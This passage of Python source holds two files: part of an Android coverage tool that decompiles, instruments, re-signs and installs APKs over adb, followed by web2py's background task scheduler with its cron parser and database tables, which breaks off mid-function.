android.permission.WRITE_EXTERNAL_STORAGE".format(config.adb_path, package) subprocess.call(write_storage_cmd, shell=True) def start_instrumenting(package, release_thread=False, onstop=None, timeout=None): grant_storage_permission(package) lock_thread = "" if release_thread else "-w" cmd = '{} shell am instrument {} {}/{}'.format(config.adb_path, lock_thread, package, config.INSTRUMENTING_NAME) if release_thread: os.system(cmd) locked = sdcard_path_exists(package) # dir is created, service started # to be change to another lock file on start timeout = config.default_onstop_timeout if timeout is None else timeout while not locked and timeout: time.sleep(1) logging.info("wait for coverage service activation {}".format(package)) locked = sdcard_path_exists(package) timeout -= 1 if not locked: raise Exception("Coverage service did not start in time ({})".format(package)) return out = '' def run(): out = request_pipe(cmd) logging.info(out) original_sigint = signal.getsignal(signal.SIGINT) def stop(signum, frame): signal.signal(signal.SIGINT, original_sigint) stop_instrumenting(package, timeout) if onstop: onstop() t = threading.Thread(target=run) t.start() print("Press Ctrl+C to finish ...") signal.signal(signal.SIGINT, stop) def sdcard_path_exists(path): cmd = "{} shell \"test -e /mnt/sdcard/{} > /dev/null 2>&1 && echo \'1\' || echo \'0\'\"".format(config.adb_path, path) logging.debug('Command to check lock file:' + cmd) locked = subprocess.check_output(cmd, shell=True).replace("\n","").replace("\r", "") return locked == '1' def coverage_is_locked(package_name): lock_file = "{}.lock".format(package_name) return sdcard_path_exists(lock_file) def stop_instrumenting(package_name, timeout=None): cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) logging.info("finish testing") result = subprocess.call(cmd, shell=True) logging.info(result) locked = coverage_is_locked(package_name) if timeout is None: timeout = config.default_onstop_timeout while locked and timeout: logging.info("wait until the coverage file is saved {}".format(package_name)) time.sleep(1) locked = coverage_is_locked(package_name) timeout -= 1 files = get_package_files_list(package_name) coverage_files = [f for f in files if f.endswith(".ec")] crash_file = CRASH_REPORT_FILENAME if CRASH_REPORT_FILENAME in files else None logging.info("coverage files at /mnt/sdcard/{0}:".format(package_name)) logging.info("\n".join(coverage_files)) if crash_file: logging.info("crash report /mnt/sdcard/{0}/{1}".format(package_name, crash_file)) def snap(package_name, i=0, output=None): logging.info("ec+screen {}".format(i)) snap_cmd = "{} shell am broadcast -a 'tool.acv.finishtesting'".format(config.adb_path) result = subprocess.call(snap_cmd) if output: if not os.path.exists(output): os.makedirs(output) files = [f for f in get_package_files_list(package_name) if f.endswith(".ec")] pull_files(output, files, package_name) #screens # files = get_package_files_list(package_name) # adb_files_ec_set = [f for f in files if f.endswith('.ec')] # if len(adb_files_ec_set) > 0: # new_ec = adb_files_ec_set[-1] # time_mark = new_ec.split('_')[1][:-3] # logging.info("screen..") # scrn_cmd = "{} shell screencap -p /mnt/sdcard/{}/{}.png".format(config.adb_path, package_name, time_mark) # result = subprocess.call(scrn_cmd) # else: # logging.info("No ec files saved on sdcard.") # return def save_ec_and_screen(package_name, delay=10, output=None, snap_number=722): # 720 per 10s is 2 hours i = 1 logging.info("scheduler: {}, {} sec output: {}".format(package_name, delay, output)) schedule = sched.scheduler(time.time, time.sleep) while i < snap_number: schedule.enter(delay*i, i, snap, (package_name, i, output)) i += 1 schedule.run() @timeit def instrument_apk(apk_path, result_dir, dbg_start=None, dbg_end=None, installation=False, granularity=Granularity.default, mem_stats=None, ignore_filter=None, keep_unpacked=False): ''' I assume that the result_dir is empty is checked. ''' apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) package = get_apk_properties(apk_path).package unpacked_data_path = decompile_apk(apktool, apk_path, package, result_dir) manifest_path = get_path_to_manifest(unpacked_data_path) logging.info("decompiled {0}".format(package)) instrument_manifest(manifest_path) smali_code_path = get_path_to_smali_code(unpacked_data_path) file_name = os.path.basename(apk_path)[:-4] pickle_path = get_pickle_path(file_name, result_dir) instrument_smali_code(smali_code_path, pickle_path, package, granularity, dbg_start, dbg_end, mem_stats, ignore_filter) logging.info("instrumented") instrumented_package_path = get_path_to_instrumented_package(apk_path, result_dir) remove_if_exits(instrumented_package_path) build_apk(apktool, unpacked_data_path, instrumented_package_path) if not keep_unpacked: Utils.rm_tree(unpacked_data_path) logging.info("built") instrumented_apk_path = get_path_to_insrumented_apk(instrumented_package_path, result_dir) sign_align_apk(instrumented_package_path, instrumented_apk_path) logging.info("apk instrumented: {0}".format(instrumented_apk_path)) logging.info("package name: {0}".format(package)) if installation: install(instrumented_apk_path) return (package, instrumented_apk_path, pickle_path) def remove_if_exits(path): if os.path.exists(path): os.remove(path) def build_dir(apktool_dir, result_dir, signature=False, installation=False): apktool = ApktoolInterface(javaPath = config.APKTOOL_JAVA_PATH, javaOpts = config.APKTOOL_JAVA_OPTS, pathApktool = Libs.APKTOOL_PATH, jarApktool = Libs.APKTOOL_PATH) build_pkg_path = os.path.join(result_dir, "build_temp.apk") build_apk(apktool, apktool_dir, build_pkg_path) package = get_apk_properties(build_pkg_path).package result_apk_path = build_pkg_path if signature: result_apk_path = os.path.join(result_dir, "build_{0}.apk".format(package)) sign_align_apk(build_pkg_path, result_apk_path) print('apk was built and signed: {0}'.format(result_apk_path)) else: print('apk was built: {0}'.format(result_apk_path)) if installation: install(result_apk_path) return result_apk_path def decompile_apk(apktool, apk_path, package, result_dir): unpacked_data_path = os.path.join(result_dir, "apktool", package) (run_successful, cmd_output) = apktool.decode(apkPath = apk_path, dirToDecompile = unpacked_data_path, quiet = True, noSrc = False, noRes = False, debug = False, noDebugInfo = False, force = True, #directory exist so without this this process finishes frameworkTag = "", frameworkDir = "", keepBrokenRes = False) if not run_successful: print("Run is not successful!") return unpacked_data_path def get_path_to_manifest(unpacked_data_path): pth = os.path.join(unpacked_data_path, "AndroidManifest.xml") return pth def get_path_to_smali_code(unpacked_data_path): pth = os.path.join(unpacked_data_path, "smali") return pth def get_path_to_instrumentation_metadata_dir(result_dir): pth = os.path.join(result_dir, "metadata") return pth def get_path_to_insrumented_apk(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) new_apk_fname = "{}_{}".format("instr", apk_fname) pth = os.path.join(result_dir, new_apk_fname) return pth def get_path_to_instrumented_package(apk_path, result_dir): apk_dir, apk_fname = os.path.split(apk_path) path = os.path.join(result_dir, apk_fname) return path def get_pickle_path(file_name, result_dir): metadata_dir = get_path_to_instrumentation_metadata_dir(result_dir) return os.path.join(metadata_dir, "{}.pickle".format(file_name)) def instrument_manifest(manifest_path): manifest_instrumenter.instrumentAndroidManifestFile(manifest_path, addSdCardPermission=True) @timeit def instrument_smali_code(input_smali_dir, pickle_path, package, granularity, dbg_start=None, dbg_end=None, mem_stats=None, ignore_filter=None): smali_tree = SmaliTree(input_smali_dir) if ignore_filter: apply_ignore_filter(smali_tree, ignore_filter) smali_instrumenter = Instrumenter(smali_tree, granularity, package, dbg_start, dbg_end, mem_stats) smali_instrumenter.save_instrumented_smali(input_smali_dir) smali_instrumenter.save_pickle(pickle_path) def apply_ignore_filter(smali_tree, ignore_filter): if not os.path.exists(ignore_filter): return with open(ignore_filter, 'r') as f: lines = f.readlines() smali_tree.update_class_ref_dict() for l in lines: parts = l.strip().split('->') klass = parts[0] if klass in smali_tree.class_ref_dict: if len(parts) == 2 and parts[1] in smali_tree.class_ref_dict[klass].meth_ref_dict: smali_tree.class_ref_dict[klass].meth_ref_dict[parts[1]].ignore = True else: smali_tree.class_ref_dict[klass].ignore = True def sign_align_apk(instrumented_package_path, output_apk): aligned_apk_path = instrumented_package_path.replace('.apk', '_signed_tmp.apk') align_cmd = '"{}" -f 4 "{}" "{}"'.format(config.zipalign, instrumented_package_path, aligned_apk_path) request_pipe(align_cmd) apksigner_cmd = '{} sign --ks {} --ks-pass pass:{} --out {} {}'\ .format(config.apksigner_path, config.keystore_path, config.keystore_password, output_apk, aligned_apk_path) request_pipe(apksigner_cmd) os.remove(aligned_apk_path) def build_apk(apktool, apkdata_dir, new_apk_path): apktool.build(srcPath=apkdata_dir, finalApk=new_apk_path, forceAll=True, debug=False) class apkinfo(object): """Properties of the apk file.""" def __init__(self, package=None, sdkversion=None, targetsdkverion=None): self.package = package self.sdkversion = sdkversion self.targetsdkversion = targetsdkverion def __repr__(self): return "%s %s %s" % (self.package, self.sdkversion, self.targetsdkversion)
scheduler.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ | This file is part of the web2py Web Framework | Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu> | License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) Background processes made simple --------------------------------- """ from __future__ import print_function import os import re import time import multiprocessing import sys import threading import traceback import signal import socket import datetime import logging import optparse import tempfile import types from functools import reduce from json import loads, dumps from gluon import DAL, Field, IS_NOT_EMPTY, IS_IN_SET, IS_NOT_IN_DB, IS_EMPTY_OR from gluon import IS_INT_IN_RANGE, IS_DATETIME, IS_IN_DB from gluon.utils import web2py_uuid from gluon._compat import Queue, long, iteritems, PY2 from gluon.storage import Storage USAGE = """ ## Example For any existing app Create File: app/models/scheduler.py ====== from gluon.scheduler import Scheduler def demo1(*args,**vars): print('you passed args=%s and vars=%s' % (args, vars)) return 'done!' def demo2(): 1/0 scheduler = Scheduler(db,dict(demo1=demo1,demo2=demo2)) ## run worker nodes with: cd web2py python web2py.py -K myapp or python gluon/scheduler.py -u sqlite://storage.sqlite \ -f applications/myapp/databases/ \ -t mytasks.py (-h for info) python scheduler.py -h ## schedule jobs using http://127.0.0.1:8000/myapp/appadmin/insert/db/scheduler_task ## monitor scheduled jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_task.id>0 ## view completed jobs http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_run.id>0 ## view workers http://127.0.0.1:8000/myapp/appadmin/select/db?query=db.scheduler_worker.id>0 """ path = os.getcwd() if 'WEB2PY_PATH' not in os.environ: os.environ['WEB2PY_PATH'] = path IDENTIFIER = "%s#%s" % (socket.gethostname(), os.getpid()) logger = logging.getLogger('web2py.scheduler.%s' % IDENTIFIER) QUEUED = 'QUEUED' ASSIGNED = 'ASSIGNED' RUNNING = 'RUNNING' COMPLETED = 'COMPLETED' FAILED = 'FAILED' TIMEOUT = 'TIMEOUT' STOPPED = 'STOPPED' ACTIVE = 'ACTIVE' TERMINATE = 'TERMINATE' DISABLED = 'DISABLED' KILL = 'KILL' PICK = 'PICK' STOP_TASK = 'STOP_TASK' EXPIRED = 'EXPIRED' SECONDS = 1 HEARTBEAT = 3 * SECONDS MAXHIBERNATION = 10 CLEAROUT = '!clear!' CALLABLETYPES = (types.LambdaType, types.FunctionType, types.BuiltinFunctionType, types.MethodType, types.BuiltinMethodType) class Task(object): """Defines a "task" object that gets passed from the main thread to the executor's one """ def __init__(self, app, function, timeout, args='[]', vars='{}', **kwargs): logger.debug(' new task allocated: %s.%s', app, function) self.app = app self.function = function self.timeout = timeout self.args = args # json self.vars = vars # json self.__dict__.update(kwargs) def __str__(self): return '<Task: %s>' % self.function class TaskReport(object): """Defines a "task report" object that gets passed from the executor's thread to the main one """ def __init__(self, status, result=None, output=None, tb=None): logger.debug(' new task report: %s', status) if tb: logger.debug(' traceback: %s', tb) else: logger.debug(' result: %s', result) self.status = status self.result = result self.output = output self.tb = tb def __str__(self): return '<TaskReport: %s>' % self.status class JobGraph(object): """Experimental: dependencies amongs tasks.""" def __init__(self, db, job_name): self.job_name = job_name or 'job_0' self.db = db def add_deps(self, task_parent, task_child): """Create a dependency between task_parent and task_child.""" self.db.scheduler_task_deps.insert(task_parent=task_parent, task_child=task_child, job_name=self.job_name) def validate(self, job_name=None): """Validate if all tasks job_name can be completed. Checks if there are no mutual dependencies among tasks. Commits at the end if successfull, or it rollbacks the entire transaction. Handle with care! """ db = self.db sd = db.scheduler_task_deps if job_name: q = sd.job_name == job_name else: q = sd.id > 0 edges = db(q).select() nested_dict = {} for row in edges: k = row.task_parent if k in nested_dict: nested_dict[k].add(row.task_child) else: nested_dict[k] = set((row.task_child,)) try: rtn = [] for k, v in nested_dict.items(): v.discard(k) # Ignore self dependencies extra_items_in_deps = reduce(set.union, nested_dict.values()) - set(nested_dict.keys()) nested_dict.update(dict((item, set()) for item in extra_items_in_deps)) while True: ordered = set(item for item, dep in nested_dict.items() if not dep) if not ordered: break rtn.append(ordered) nested_dict = dict( (item, (dep - ordered)) for item, dep in nested_dict.items() if item not in ordered ) assert not nested_dict, "A cyclic dependency exists amongst %r" % nested_dict db.commit() return rtn except: db.rollback() return None class CronParser(object): def __init__(self, cronline, base=None): self.cronline = cronline self.sched = base or datetime.datetime.now() self.task = None @staticmethod def _rangetolist(s, period='min'): retval = [] if s.startswith('*'): if period == 'min': s = s.replace('*', '0-59', 1) elif period == 'hr': s = s.replace('*', '0-23', 1) elif period == 'dom': s = s.replace('*', '1-31', 1) elif period == 'mon': s = s.replace('*', '1-12', 1) elif period == 'dow': s = s.replace('*', '0-6', 1) m = re.compile(r'(\d+)-(\d+)/(\d+)') match = m.match(s) if match: min_, max_ = int(match.group(1)), int(match.group(2)) + 1 step_ = int(match.group(3)) else: m = re.compile(r'(\d+)/(\d+)') ranges_max = {'min': 59, 'hr': 23, 'mon': 12, 'dom': 31, 'dow': 7} match = m.match(s) if match: min_, max_ = int(match.group(1)), ranges_max[period] + 1 step_ = int(match.group(2)) if match: for i in range(min_, max_, step_): retval.append(i) return retval @staticmethod def _sanitycheck(values, period): if period == 'min': check = all(0 <= i <= 59 for i in values) elif period == 'hr': check = all(0 <= i <= 23 for i in values) elif period == 'dom': domrange = list(range(1, 32)) + ['l'] check = all(i in domrange for i in values) elif period == 'mon': check = all(1 <= i <= 12 for i in values) elif period == 'dow': check = all(0 <= i <= 7 for i in values) return check def _parse(self): line = self.cronline.lower() task = {} if line.startswith('@yearly'): line = line.replace('@yearly', '0 0 1 1 *') elif line.startswith('@annually'): line = line.replace('@annually', '0 0 1 1 *') elif line.startswith('@monthly'): line = line.replace('@monthly', '0 0 1 * *') elif line.startswith('@weekly'): line = line.replace('@weekly', '0 0 * * 0') elif line.startswith('@daily'): line = line.replace('@daily', '0 0 * * *') elif line.startswith('@midnight'): line = line.replace('@midnight', '0 0 * * *') elif line.startswith('@hourly'): line = line.replace('@hourly', '0 * * * *') params = line.strip().split() if len(params) < 5: raise ValueError('Invalid cron line (too short)') elif len(params) > 5: raise ValueError('Invalid cron line (too long)') daysofweek = {'sun': 0, 'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4, 'fri': 5, 'sat': 6} monthsofyear = {'jan': 1, 'feb': 2, 'mar': 3, 'apr': 4, 'may': 5, 'jun': 6, 'jul': 7, 'aug': 8, 'sep': 9, 'oct': 10, 'nov': 11, 'dec': 12, 'l': 'l'} for (s, i) in zip(params[:5], ['min', 'hr', 'dom', 'mon', 'dow']): if s not in [None, '*']: task[i] = [] vals = s.split(',') for val in vals: if i == 'dow': refdict = daysofweek elif i == 'mon': refdict = monthsofyear if i in ('dow', 'mon') and '-' in val and '/' not in val: isnum = val.split('-')[0].isdigit() if isnum: val = '%s/1' % val else: val = '-'.join([str(refdict[v]) for v in val.split('-')]) if val != '-1' and '-' in val and '/' not in val: val = '%s/1' % val if '/' in val: task[i] += self._rangetolist(val, i) elif val.isdigit() or val == '-1': task[i].append(int(val)) elif i in ('dow', 'mon'): if val in refdict: task[i].append(refdict[val]) elif i == 'dom' and val == 'l': task[i].append(val) if not task[i]: raise ValueError('Invalid cron value (%s)' % s) if not self._sanitycheck(task[i], i): raise ValueError('Invalid cron value (%s)' % s) task[i] = sorted(task[i]) self.task = task @staticmethod def _get_next_dow(sched, task): task_dow = [a % 7 for a in task['dow']] while sched.isoweekday() % 7 not in task_dow: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_dom(sched, task): if task['dom'] == ['l']: last_feb = 29 if sched.year % 4 == 0 else 28 lastdayofmonth = [ 31, last_feb, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 ] task_dom = [lastdayofmonth[sched.month - 1]] else: task_dom = task['dom'] while sched.day not in task_dom: sched += datetime.timedelta(days=1) return sched @staticmethod def _get_next_mon(sched, task): while sched.month not in task['mon']: if sched.month < 12: sched = sched.replace(month=sched.month + 1) else: sched = sched.replace(month=1, year=sched.year + 1) return sched @staticmethod def _getnext_hhmm(sched, task, add_to=True): if add_to: sched += datetime.timedelta(minutes=1) if 'min' in task: while sched.minute not in task['min']: sched += datetime.timedelta(minutes=1) if 'hr' in task and sched.hour not in task['hr']: while sched.hour not in task['hr']: sched += datetime.timedelta(hours=1) return sched def _getnext_date(self, sched, task): if 'dow' in task and 'dom' in task: dow = self._get_next_dow(sched, task) dom = self._get_next_dom(sched, task) sched = min(dow, dom) elif 'dow' in task: sched = self._get_next_dow(sched, task) elif 'dom' in task: sched = self._get_next_dom(sched, task) if 'mon' in task: sched = self._get_next_mon(sched, task) return sched.replace(hour=0, minute=0) def get_next(self): """Get next date according to specs.""" if not self.task: self._parse() task = self.task sched = self.sched x = 0 while x < 1000: # avoid potential max recursions x += 1 try: next_date = self._getnext_date(sched, task) except (ValueError, OverflowError) as e: raise ValueError('Invalid cron expression (%s)' % e) if next_date.date() > self.sched.date(): # we rolled date, check for valid hhmm sched = self._getnext_hhmm(next_date, task, False) break else: # same date, get next hhmm sched_time = self._getnext_hhmm(sched, task, True) if sched_time.date() > sched.date(): # we rolled date again :( sched = sched_time else: sched = sched_time break else: raise ValueError('Potential bug found, please submit your ' 'cron expression to the authors') self.sched = sched return sched def __iter__(self): """Support iteration.""" return self __next__ = next = get_next # the two functions below deal with simplejson decoding as unicode, esp for the dict decode # and subsequent usage as function Keyword arguments unicode variable names won't work! # borrowed from http://stackoverflow.com/questions/956867/ def _decode_list(lst): if not PY2: return lst newlist = [] for i in lst: if isinstance(i, unicode): i = i.encode('utf-8') elif isinstance(i, list): i = _decode_list(i) newlist.append(i) return newlist def _decode_dict(dct): if not PY2: return dct newdict = {} for k, v in iteritems(dct): if isinstance(k, unicode): k = k.encode('utf-8') if isinstance(v, unicode): v = v.encode('utf-8') elif isinstance(v, list): v = _decode_list(v) newdict[k] = v return newdict def executor(queue, task, out): """The function used to execute tasks in the background process.""" logger.debug(' task started') class LogOutput(object): """Facility to log output at intervals.""" def __init__(self, out_queue): self.out_queue = out_queue self.stdout = sys.stdout sys.stdout = self def __del__(self): sys.stdout = self.stdout def flush(self): pass def write(self, data): self.out_queue.put(data) W2P_TASK = Storage({ 'id': task.task_id, 'uuid': task.uuid, 'run_id': task.run_id }) stdout = LogOutput(out) try: if task.app: os.chdir(os.environ['WEB2PY_PATH']) from gluon.shell import env, parse_path_info from gluon import current level = logging.getLogger().getEffectiveLevel() logging.getLogger().setLevel(logging.WARN) # Get controller-specific subdirectory if task.app is of # form 'app/controller' (a, c, f) = parse_path_info(task.app) _env = env(a=a, c=c, import_models=True, extra_request={'is_scheduler': True}) logging.getLogger().setLevel(level) f = task.function functions = current._scheduler.tasks if not functions: # look into env _function = _env.get(f) else: _function = functions.get(f) if not isinstance(_function, CALLABLETYPES): raise NameError( "name '%s' not found in scheduler's environment" % f) # Inject W2P_TASK into environment _env.update({'W2P_TASK': W2P_TASK}) # Inject W2P_TASK into current from gluon import current current.W2P_TASK = W2P_TASK globals().update(_env) args = _decode_list(loads(task.args)) vars = loads(task.vars, object_hook=_decode_dict) result = dumps(_function(*args, **vars)) else: # for testing purpose only result = eval(task.function)( *loads(task.args, object_hook=_decode_dict), **loads(task.vars, object_hook=_decode_dict)) if len(result) >= 1024: fd, temp_path = tempfile.mkstemp(suffix='.w2p_sched') with os.fdopen(fd, 'w') as f: f.write(result) result = 'w2p_special:%s' % temp_path queue.put(TaskReport('COMPLETED', result=result)) except BaseException as e: tb = traceback.format_exc() queue.put(TaskReport('FAILED', tb=tb)) del stdout class MetaScheduler(threading.Thread): """Base class documenting scheduler's base methods.""" def __init__(self): threading.Thread.__init__(self) self.process = None # the background process self.have_heartbeat = True # set to False to kill self.empty_runs = 0 def async(self, task): """Start the background process. Args: task : a `Task` object Returns: tuple: containing:: ('ok',result,output) ('error',exception,None) ('timeout',None,None) ('terminated',None,None) """ db = self.db sr = db.scheduler_run out = multiprocessing.Queue() queue = multiprocessing.Queue(maxsize=1) p = multiprocessing.Process(target=executor, args=(queue, task, out)) self.process = p logger.debug(' task starting') p.start() task_output = "" tout = "" try: if task.sync_output > 0: run_timeout = task.sync_output else: run_timeout = task.timeout start = time.time() while p.is_alive() and (not task.timeout or time.time() - start < task.timeout): if tout: try: logger.debug(' partial output saved') db(sr.id == task.run_id).update(run_output=task_output) db.commit() except: pass p.join(timeout=run_timeout) tout = "" while not out.empty(): tout += out.get() if tout: logger.debug(' partial output: "%s"', str(tout)) if CLEAROUT in tout: task_output = tout[ tout.rfind(CLEAROUT) + len(CLEAROUT):] else: task_output += tout except: p.terminate() p.join() logger.debug(' task stopped by general exception') tr = TaskReport(STOPPED) else: if p.is_alive(): p.terminate() logger.debug(' task timeout') try: # we try to get a traceback here tr = queue.get(timeout=2) tr.status = TIMEOUT tr.output = task_output except Queue.Empty: tr = TaskReport(TIMEOUT) elif queue.empty(): logger.debug(' task stopped') tr = TaskReport(STOPPED) else: logger.debug(' task completed or failed') tr = queue.get() result = tr.result if result and result.startswith('w2p_special'): temp_path = result.replace('w2p_special:', '', 1) with open(temp_path) as f: tr.result = f.read() os.unlink(temp_path) tr.output = task_output return tr def die(self): """Forces termination of the worker process along with any running task""" logger.info('die!') self.have_heartbeat = False self.terminate_process() def give_up(self): """Waits for any running task to be executed, then exits the worker process""" logger.info('Giving up as soon as possible!') self.have_heartbeat = False def terminate_process(self): """Terminate any running tasks (internal use only)""" try: self.process.terminate() except: pass # no process to terminate def run(self): """This is executed by the main thread to send heartbeats""" counter = 0 while self.have_heartbeat: self.send_heartbeat(counter) counter += 1 def start_heartbeats(self): self.start() def send_heartbeat(self, counter): raise NotImplementedError def pop_task(self): """Fetches a task ready to be executed""" raise NotImplementedError def report_task(self, task, task_report): """Creates a task report""" raise NotImplementedError def sleep(self): raise NotImplementedError def loop(self): """Main loop, fetching tasks and starting executor's background processes""" raise NotImplementedError TASK_STATUS = (QUEUED, RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED, EXPIRED) RUN_STATUS = (RUNNING, COMPLETED, FAILED, TIMEOUT, STOPPED) WORKER_STATUS = (ACTIVE, PICK, DISABLED, TERMINATE, KILL, STOP_TASK) class IS_CRONLINE(object): """ Validates cronline """ def __init__(self, error_message=None): self.error_message = error_message def __call__(self, value): recur = CronParser(value, datetime.datetime.now()) try: recur.get_next() return (value, None) except (KeyError, ValueError) as e: if not self.error_message: return (value, e) return (value, self.error_message) class TYPE(object): """ Validator that checks whether field is valid json and validates its type. Used for `args` and `vars` of the scheduler_task table """ def __init__(self, myclass=list, parse=False): self.myclass = myclass self.parse = parse def __call__(self, value): from gluon import current try: obj = loads(value) except: return (value, current.T('invalid json')) else: if isinstance(obj, self.myclass): if self.parse: return (obj, None) else: return (value, None) else: return (value, current.T('Not of type: %s') % self.myclass) class Scheduler(MetaScheduler): """Scheduler object Args: db: DAL connection where Scheduler will create its tables tasks(dict): either a dict containing name-->func or None. If None, functions will be searched in the environment migrate(bool): turn migration on/off for the Scheduler's tables worker_name(str): force worker_name to identify each process. Leave it to None to autoassign a name (hostname#pid) group_names(list): process tasks belonging to this group defaults to ['main'] if nothing gets passed heartbeat(int): how many seconds the worker sleeps between one execution and the following one. Indirectly sets how many seconds will pass between checks for new tasks max_empty_runs(int): how many loops are allowed to pass without processing any tasks before exiting the process. 0 to keep always the process alive discard_results(bool): Scheduler stores executions's details into the scheduler_run table. By default, only if there is a result the details are kept. Turning this to True means discarding results even for tasks that return something utc_time(bool): do all datetime calculations assuming UTC as the timezone. Remember to pass `start_time` and `stop_time` to tasks accordingly """ def __init__(self, db, tasks=None, migrate=True, worker_name=None, group_names=None, heartbeat=HEARTBEAT, max_empty_runs=0, discard_results=False, utc_time=False): MetaScheduler.__init__(self) self.db = db self.db_thread = None self.tasks = tasks self.group_names = group_names or ['main'] self.heartbeat = heartbeat self.worker_name = worker_name or IDENTIFIER self.max_empty_runs = max_empty_runs self.discard_results = discard_results self.is_a_ticker = False self.do_assign_tasks = False self.greedy = False self.utc_time = utc_time self.w_stats = Storage( dict( status=RUNNING, sleep=heartbeat, total=0, errors=0, empty_runs=0, queue=0, distribution=None, workers=0) ) # dict holding statistics from gluon import current current._scheduler = self self.define_tables(db, migrate=migrate) def __get_migrate(self, tablename, migrate=True): if migrate is False: return False elif migrate is True: return True elif isinstance(migrate, str): return "%s%s.table" % (migrate, tablename) return True def now(self): """Shortcut that fetches current time based on UTC preferences.""" return self.utc_time and datetime.datetime.utcnow() or datetime.datetime.now() def set_requirements(self, scheduler_task): """Called to set defaults for lazy_tables connections.""" from gluon import current if hasattr(current, 'request'): scheduler_task.application_name.default = '%s/%s' % ( current.request.application, current.request.controller ) def define_tables(self, db, migrate): """Define Scheduler tables structure.""" from pydal.base import DEFAULT logger.debug('defining tables (migrate=%s)', migrate) now = self.now db.define_table( 'scheduler_task', Field('application_name', requires=IS_NOT_EMPTY(), default=None, writable=False), Field('task_name', default=None), Field('group_name', default='main'), Field('status', requires=IS_IN_SET(TASK_STATUS), default=QUEUED, writable=False), Field('function_name', requires=IS_IN_SET(sorted(self.tasks.keys())) if self.tasks else DEFAULT), Field('uuid', length=255, requires=IS_NOT_IN_DB(db, 'scheduler_task.uuid'), unique=True, default=web2py_uuid), Field('args', 'text', default='[]', requires=TYPE(list)), Field('vars', 'text', default='{}', requires=TYPE(dict)), Field('enabled', 'boolean', default=True), Field('start_time', 'datetime', default=now, requires=IS_DATETIME()), Field('next_run_time', 'datetime', default=now), Field('stop_time', 'datetime'), Field('repeats', 'integer', default=1, comment="0=unlimited", requires=IS_INT_IN_RANGE(0, None)), Field('retry_failed', 'integer', default=0, comment="-1=unlimited", requires=IS_INT_IN_RANGE(-1, None)), Field('period', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(0, None)), Field('prevent_drift', 'boolean', default=False, comment='Exact start_times between runs'), Field('cronline', default=None, comment='Discard "period", use this cron expr instead', requires=IS_EMPTY_OR(IS_CRONLINE())), Field('timeout', 'integer', default=60, comment='seconds', requires=IS_INT_IN_RANGE(1, None)), Field('sync_output', 'integer', default=0, comment="update output every n sec: 0=never", requires=IS_INT_IN_RANGE(0, None)), Field('times_run', 'integer', default=0, writable=False), Field('times_failed', 'integer', default=0, writable=False), Field('last_run_time', 'datetime', writable=False, readable=False), Field('assigned_worker_name', default='', writable=False), on_define=self.set_requirements, migrate=self.__get_migrate('scheduler_task', migrate), format='(%(id)s) %(task_name)s') db.define_table( 'scheduler_run', Field('task_id', 'reference scheduler_task'), Field('status', requires=IS_IN_SET(RUN_STATUS)), Field('start_time', 'datetime'), Field('stop_time', 'datetime'), Field('run_output', 'text'), Field('run_result', 'text'), Field('traceback', 'text'), Field('worker_name', default=self.worker_name), migrate=self.__get_migrate('scheduler_run', migrate) ) db.define_table( 'scheduler_worker', Field('worker_name', length=255, unique=True), Field('first_heartbeat', 'datetime'), Field('last_heartbeat', 'datetime'), Field('status', requires=IS_IN_SET(WORKER_STATUS)), Field('is_ticker', 'boolean', default=False, writable=False), Field('group_names', 'list:string', default=self.group_names), Field('worker_stats', 'json'), migrate=self.__get_migrate('scheduler_worker', migrate) ) db.define_table( 'scheduler_task_deps', Field('job_name', default='job_0'), Field('task_parent', 'integer', requires=IS_IN_DB(db, 'scheduler_task.id', '%(task_name)s') ), Field('task_child', 'reference scheduler_task'), Field('can_visit', 'boolean', default=False), migrate=self.__get_migrate('scheduler_task_deps', migrate) ) if migrate is not False: db.commit() def loop(self, worker_name=None): """Main loop. This works basically as a neverending loop that: - checks if the worker is ready to process tasks (is not DISABLED) - pops a task from the queue - if there is a task: - spawns the executor background process - waits for the process to be finished - sleeps `heartbeat` seconds - if there is not a task: - checks for max_empty_runs - sleeps `heartbeat` seconds """ signal.signal(signal.SIGTERM, lambda signum, stack_frame: sys.exit(1)) try: self.start_heartbeats() while self.have_heartbeat: if self.w_stats.status == DISABLED: logger.debug('Someone stopped me, sleeping until better' ' times come (%s)', self.w_stats.sleep) self.sleep() continue logger.debug('looping...') task = self.wrapped_pop_task() if task: self.w_stats.empty_runs = 0 self.w_stats.status = RUNNING self.w_stats.total += 1 self.wrapped_report_task(task, self.async(task)) if not self.w_stats.status == DISABLED: self.w_stats.status = ACTIVE else: self.w_stats.empty_runs += 1 logger.debug('sleeping...') if self.max_empty_runs != 0: logger.debug('empty runs %s/%s', self.w_stats.empty_runs, self.max_empty_runs) if self.w_stats.empty_runs >= self.max_empty_runs: logger.info( 'empty runs limit reached, killing myself') self.die() self.sleep() except (KeyboardInterrupt, SystemExit): logger.info('catched') self.die() def wrapped_assign_tasks(self, db): """Commodity function to call `assign_tasks` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `assign_task` after 0.5 seconds """ logger.debug('Assigning tasks...') db.commit() # db.commit() only for Mysql x = 0 while x < 10: try: self.assign_tasks(db) db.commit() logger.debug('Tasks assigned...') break except: self.w_stats.errors += 1 db.rollback() logger.error('TICKER: error assigning tasks (%s)', x) x += 1 time.sleep(0.5) def wrapped_pop_task(self): """Commodity function to call `pop_task` and trap exceptions. If an exception is raised, assume it happened because of database contention and retries `pop_task` after 0.5 seconds """ db = self.db db.commit() # another nifty db.commit() only for Mysql x = 0 while x < 10: try: rtn = self.pop_task(db) return rtn break except: self.w_stats.errors += 1 db.rollback() logger.error(' error popping tasks') x += 1 time.sleep(0.5) def pop_task(self, db): """Grab a task ready to be executed from the queue.""" now = self.now() st = self.db.scheduler_task if self.is_a_ticker and self.do_assign_tasks: # I'm a 